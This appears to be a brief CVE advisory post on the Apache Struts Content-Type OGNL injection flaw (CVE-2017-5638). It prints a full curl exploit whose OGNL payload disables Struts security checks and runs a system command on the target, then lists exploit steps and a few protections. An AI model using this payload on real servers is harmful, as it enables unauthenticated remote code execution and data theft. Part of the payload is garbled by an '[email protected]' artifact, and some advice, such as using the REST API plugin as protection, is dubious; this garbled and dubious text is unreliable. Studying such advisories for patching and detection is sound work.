Apache Struts, Remote Code Execution, CVE-2017-5638 (Critical)

By /

Listen to this Post

How the mentioned CVE works:

The CVE-2017-5638 vulnerability resides in the Jakarta Multipart parser of Apache Struts. The exploit is triggered by a malformed `Content-Type` HTTP header. When a request is sent with a crafted `Content-Type` value containing an OGNL expression, the flawed exception handling mechanism in the parser incorrectly evaluates this expression instead of treating it as an error. This occurs because the error message, which incorporates the malicious header value, is passed directly to the `LocalizedTextUtil.findText()` method. This method interprets the injected OGNL code, allowing an unauthenticated attacker to achieve remote code execution with the privileges of the Struts application server. The vulnerability is network-exploitable and requires no user interaction, making it highly dangerous.

DailyCVE Form:

Platform: Apache Struts
Version: 2.3.5 – 2.3.31, 2.5 – 2.5.10
Vulnerability: Remote Code Execution
Severity: Critical
Date: 2017-03-07

Prediction: 2017-03-10

What Undercode Say:

`curl -H “Content-Type: %{(_=’multipart/form-data’).([email protected]@DEFAULT_MEMBER_ACCESS).(_memberAccess?(_memberAccess=dm):((container=context[‘com.opensymphony.xwork2.ActionContext.container’]).(ognlUtil=container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(ognlUtil.getExcludedPackageNames().clear()).(ognlUtil.getExcludedClasses().clear()).(context.setMemberAccess(dm)))).(cmd=’id’).(iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(cmds=(iswin?{‘cmd.exe’,’/c’,cmd}:{‘/bin/bash’,’-c’,cmd})).(p=new java.lang.ProcessBuilder(cmds)).(p.redirectErrorStream(true)).(process=p.start()).(ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(process.getInputStream(),ros)).(ros.flush())}” http://target-host.com/struts2-showcase/fileupload/doUpload.action`

How Exploit:

Craft malicious HTTP request.

Set malicious OGNL in Content-Type.

Send request to Struts endpoint.

OGNL expression executes commands.

Protection from this CVE:

Upgrade Struts immediately.

Apply vendor patch.

Use REST API plugin.

Filter malicious requests.

Impact:

Remote Code Execution.

Full System Compromise.

Data Theft.

Service Disruption.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top